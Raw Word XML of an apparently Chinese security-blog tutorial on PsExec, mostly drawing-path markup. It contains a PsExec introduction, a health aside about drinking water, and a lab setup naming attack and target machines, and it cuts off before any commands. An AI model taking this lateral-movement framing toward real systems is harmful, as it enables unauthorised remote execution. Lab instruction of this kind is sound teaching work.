        <v:shape style="position:absolute;left:4830;top:13650;width:130;height:270" coordorigin="4830,13650" coordsize="130,270" path="m4856,13666l4856,13666,4856,13666,4856,13666,4856,13666,4856,13666,4856,13666,4856,13666,4856,13666,4856,13666,4856,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4857,13666,4858,13666,4858,13666,4858,13666,4858,13666,4858,13666,4858,13666,4859,13666,4859,13666,4859,13666,4859,13666,4860,13666,4860,13666,4860,13666,4860,13666,4861,13666,4861,13666,4861,13666,4862,13666,4862,13666,4863,13666,4863,13666,4863,13666,4864,13666,4864,13666,4865,13666,4865,13666,4866,13666,4866,13666,4867,13666,4868,13666,4868,13666,4869,13666,4870,13666,4870,13666,4871,13666,4872,13666,4873,13666,4873,13666,4874,13666,4875,13666,4876,13666,4877,13666,4878,13666,4879,13666,4880,13666,4881,13666,4882,13666,4883,13666,4884,13666,4885,13666,4887,13666,4888,13666,4889,13666,4890,13666,4892,13666,4893,13666,4894,13666,4896,13666,4897,13666,4899,13666,4900,13666,4902,13666,4903,13666,4905,13666,4907,13666,4908,13666,4910,13666,4912,13666,4914,13666,4916,13666,4918,13666,4919,13666,4921,13666,4924,13666,4926,13666,4928,13666,4930,13666,4932,13666,4934,13666,4937,13666,4939,13666,4941,13666,4944,13666,4946,13666,4949,13666,4951,13666,4954,13666,4957,13666,4959,13666,4962,13666,4965,13666,4968,13666,4971,13666,4974,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13666,4977,13667,4977,13667,4977,13667,4977,13667,4977,13667,4977,13667,4977,13667,4977,13668,4977,13668,4977,13668,4977,13669,4977,13669,4977,13669,4977,13670,4977,13670,4977,13670,4977,13671,4977,13671,4977,13672,4977,13672,4977,13673,4977,13674,4977,13674,4977,13675,4977,13676,4977,13676,4977,13677,4977,13678,4977,13679,4977,13680,4977,13681,4977,13682,4977,13683,4977,13684,4977,13685,4977,13686,4977,13687,4977,13688,4977,13690,4977,13691,4977,13692,4977,13694,4977,13695,4977,13697,4977,13699,4977,13700,4977,13702,4977,13704,4977,13706,4977,13707,4977,13709,4977,13711,4977,13713,4977,13716,4977,13718,4977,13720,4977,13722,4977,13725,4977,13727,4977,13730,4977,13732,4977,13735,4977,13738,4977,13741,4977,13743,4977,13746,4977,13749,4977,13752,4977,13756,4977,13759,4977,13762,4977,13766,4977,13769,4977,13773,4977,13776,4977,13780,4977,13784,4977,13788,4977,13792,4977,13796,4977,13800,4977,13804,4977,13808,4977,13813,4977,13817,4977,13822,4977,13827,4977,13831,4977,13836,4977,13841,4977,13846,4977,13851,4977,13857,4977,13862,4977,13867,4977,13873,4977,13879,4977,13884,4977,13890,4977,13896,4977,13902,4977,13908,4977,13915,4977,13921,4977,13921,4977,13921,4977,13921,4977,13921,4977,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4976,13921,4975,13921,4975,13921,4975,13921,4975,13921,4975,13921,4975,13921,4974,13921,4974,13921,4974,13921,4974,13921,4973,13921,4973,13921,4973,13921,4973,13921,4972,13921,4972,13921,4972,13921,4971,13921,4971,13921,4970,13921,4970,13921,4970,13921,4969,13921,4969,13921,4968,13921,4968,13921,4967,13921,4966,13921,4966,13921,4965,13921,4965,13921,4964,13921,4963,13921,4963,13921,4962,13921,4961,13921,4960,13921,4960,13921,4959,13921,4958,13921,4957,13921,4956,13921,4955,13921,4954,13921,4953,13921,4952,13921,4951,13921,4950,13921,4949,13921,4948,13921,4946,13921,4945,13921,4944,13921,4943,13921,4941,13921,4940,13921,4939,13921,4937,13921,4936,13921,4934,13921,4933,13921,4931,13921,4930,13921,4928,13921,4926,13921,4925,13921,4923,13921,4921,13921,4919,13921,4917,13921,4915,13921,4913,13921,4911,13921,4909,13921,4907,13921,4905,13921,4903,13921,4901,13921,4899,13921,4896,13921,4894,13921,4892,13921,4889,13921,4887,13921,4884,13921,4882,13921,4879,13921,4876,13921,4874,13921,4871,13921,4868,13921,4865,13921,4862,13921,4859,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13921,4856,13920,4856,13920,4856,13920,4856,13920,4856,13920,4856,13920,4856,13919,4856,13919,4856,13919,4856,13919,4856,13918,4856,13918,4856,13918,4856,13917,4856,13917,4856,13917,4856,13916,4856,13916,4856,13915,4856,13915,4856,13914,4856,13913,4856,13913,4856,13912,4856,13911,4856,13911,4856,13910,4856,13909,4856,13908,4856,13907,4856,13906,4856,13905,4856,13904,4856,13903,4856,13902,4856,13901,4856,13900,4856,13898,4856,13897,4856,13896,4856,13894,4856,13893,4856,13891,4856,13890,4856,13888,4856,13887,4856,13885,4856,13883,4856,13881,4856,13879,4856,13877,4856,13875,4856,13873,4856,13871,4856,13869,4856,13867,4856,13865,4856,13862,4856,13860,4856,13857,4856,13855,4856,13852,4856,13849,4856,13846,4856,13844,4856,13841,4856,13838,4856,13834,4856,13831,4856,13828,4856,13825,4856,13821,4856,13818,4856,13814,4856,13811,4856,13807,4856,13803,4856,13799,4856,13795,4856,13791,4856,13787,4856,13783,4856,13779,4856,13774,4856,13770,4856,13765,4856,13760,4856,13756,4856,13751,4856,13746,4856,13741,4856,13736,4856,13730,4856,13725,4856,13720,4856,13714,4856,13708,4856,13703,4856,13697,4856,13691,4856,13685,4856,13679,4856,13672,4856,13666e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:313.500pt;margin-top:682.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6270,13650" coordsize="130,270">
        <v:shape style="position:absolute;left:6270;top:13650;width:130;height:270" coordorigin="6270,13650" coordsize="130,270" path="m6297,13666l6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6297,13666,6298,13666,6298,13666,6298,13666,6298,13666,6298,13666,6298,13666,6298,13666,6298,13666,6298,13666,6298,13666,6299,13666,6299,13666,6299,13666,6299,13666,6299,13666,6300,13666,6300,13666,6300,13666,6300,13666,6300,13666,6301,13666,6301,13666,6301,13666,6302,13666,6302,13666,6302,13666,6303,13666,6303,13666,6304,13666,6304,13666,6305,13666,6305,13666,6306,13666,6306,13666,6307,13666,6307,13666,6308,13666,6308,13666,6309,13666,6310,13666,6310,13666,6311,13666,6312,13666,6313,13666,6313,13666,6314,13666,6315,13666,6316,13666,6317,13666,6318,13666,6319,13666,6320,13666,6321,13666,6322,13666,6323,13666,6324,13666,6325,13666,6326,13666,6327,13666,6328,13666,6330,13666,6331,13666,6332,13666,6334,13666,6335,13666,6336,13666,6338,13666,6339,13666,6341,13666,6342,13666,6344,13666,6346,13666,6347,13666,6349,13666,6351,13666,6353,13666,6354,13666,6356,13666,6358,13666,6360,13666,6362,13666,6364,13666,6366,13666,6368,13666,6371,13666,6373,13666,6375,13666,6377,13666,6380,13666,6382,13666,6384,13666,6387,13666,6389,13666,6392,13666,6395,13666,6397,13666,6400,13666,6403,13666,6406,13666,6408,13666,6411,13666,6414,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13666,6417,13667,6417,13667,6417,13667,6417,13667,6417,13667,6417,13667,6417,13667,6417,13668,6417,13668,6417,13668,6417,13669,6417,13669,6417,13669,6417,13670,6417,13670,6417,13670,6417,13671,6417,13671,6417,13672,6417,13672,6417,13673,6417,13674,6417,13674,6417,13675,6417,13676,6417,13676,6417,13677,6417,13678,6417,13679,6417,13680,6417,13681,6417,13682,6417,13683,6417,13684,6417,13685,6417,13686,6417,13687,6417,13688,6417,13690,6417,13691,6417,13692,6417,13694,6417,13695,6417,13697,6417,13699,6417,13700,6417,13702,6417,13704,6417,13706,6417,13707,6417,13709,6417,13711,6417,13713,6417,13716,6417,13718,6417,13720,6417,13722,6417,13725,6417,13727,6417,13730,6417,13732,6417,13735,6417,13738,6417,13741,6417,13743,6417,13746,6417,13749,6417,13752,6417,13756,6417,13759,6417,13762,6417,13766,6417,13769,6417,13773,6417,13776,6417,13780,6417,13784,6417,13788,6417,13792,6417,13796,6417,13800,6417,13804,6417,13808,6417,13813,6417,13817,6417,13822,6417,13827,6417,13831,6417,13836,6417,13841,6417,13846,6417,13851,6417,13857,6417,13862,6417,13867,6417,13873,6417,13879,6417,13884,6417,13890,6417,13896,6417,13902,6417,13908,6417,13915,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6417,13921,6416,13921,6416,13921,6416,13921,6416,13921,6416,13921,6416,13921,6416,13921,6415,13921,6415,13921,6415,13921,6415,13921,6415,13921,6414,13921,6414,13921,6414,13921,6414,13921,6413,13921,6413,13921,6413,13921,6412,13921,6412,13921,6412,13921,6411,13921,6411,13921,6410,13921,6410,13921,6409,13921,6409,13921,6408,13921,6408,13921,6407,13921,6407,13921,6406,13921,6405,13921,6405,13921,6404,13921,6403,13921,6403,13921,6402,13921,6401,13921,6400,13921,6399,13921,6399,13921,6398,13921,6397,13921,6396,13921,6395,13921,6394,13921,6393,13921,6392,13921,6391,13921,6390,13921,6388,13921,6387,13921,6386,13921,6385,13921,6383,13921,6382,13921,6381,13921,6379,13921,6378,13921,6376,13921,6375,13921,6373,13921,6372,13921,6370,13921,6369,13921,6367,13921,6365,13921,6364,13921,6362,13921,6360,13921,6358,13921,6356,13921,6354,13921,6352,13921,6350,13921,6348,13921,6346,13921,6344,13921,6342,13921,6339,13921,6337,13921,6335,13921,6332,13921,6330,13921,6327,13921,6325,13921,6322,13921,6320,13921,6317,13921,6314,13921,6312,13921,6309,13921,6306,13921,6303,13921,6300,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13921,6297,13920,6297,13920,6297,13920,6297,13920,6297,13920,6297,13920,6297,13919,6297,13919,6297,13919,6297,13919,6297,13918,6297,13918,6297,13918,6297,13917,6297,13917,6297,13917,6297,13916,6297,13916,6297,13915,6297,13915,6297,13914,6297,13913,6297,13913,6297,13912,6297,13911,6297,13911,6297,13910,6297,13909,6297,13908,6297,13907,6297,13906,6297,13905,6297,13904,6297,13903,6297,13902,6297,13901,6297,13900,6297,13898,6297,13897,6297,13896,6297,13894,6297,13893,6297,13891,6297,13890,6297,13888,6297,13887,6297,13885,6297,13883,6297,13881,6297,13879,6297,13877,6297,13875,6297,13873,6297,13871,6297,13869,6297,13867,6297,13865,6297,13862,6297,13860,6297,13857,6297,13855,6297,13852,6297,13849,6297,13846,6297,13844,6297,13841,6297,13838,6297,13834,6297,13831,6297,13828,6297,13825,6297,13821,6297,13818,6297,13814,6297,13811,6297,13807,6297,13803,6297,13799,6297,13795,6297,13791,6297,13787,6297,13783,6297,13779,6297,13774,6297,13770,6297,13765,6297,13760,6297,13756,6297,13751,6297,13746,6297,13741,6297,13736,6297,13730,6297,13725,6297,13720,6297,13714,6297,13708,6297,13703,6297,13697,6297,13691,6297,13685,6297,13679,6297,13672,6297,13666e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr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364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autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>专</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注APT攻击与防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>poor.blogspot.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="321" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>请多喝点热水或者凉白开，可预防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>肾结石</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通风</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>痛风可伴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="321" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sExec简介：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="321" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1253" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>微软于2006年7月收购sysinterna</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls公司，PsExec是SysinternalsSuite的小工具之一，是一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>种轻量级的telnet替代品，允许在其他系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>统上执行进程，完成控制台应用程序的完全交互，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>而无需手</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>动安装客户端软件，并且可以获得与控制台应用程序相当的完全交互性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="221" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>软官方文档：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://docs.micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>soft.com/zh-cn/sysinternals/downloads/psexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="321" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PsExec.exe没有默认安装在windows系统。</w:t>
      </w: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321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autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4121"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Debian</w:t>
      </w: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101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autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.1.119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
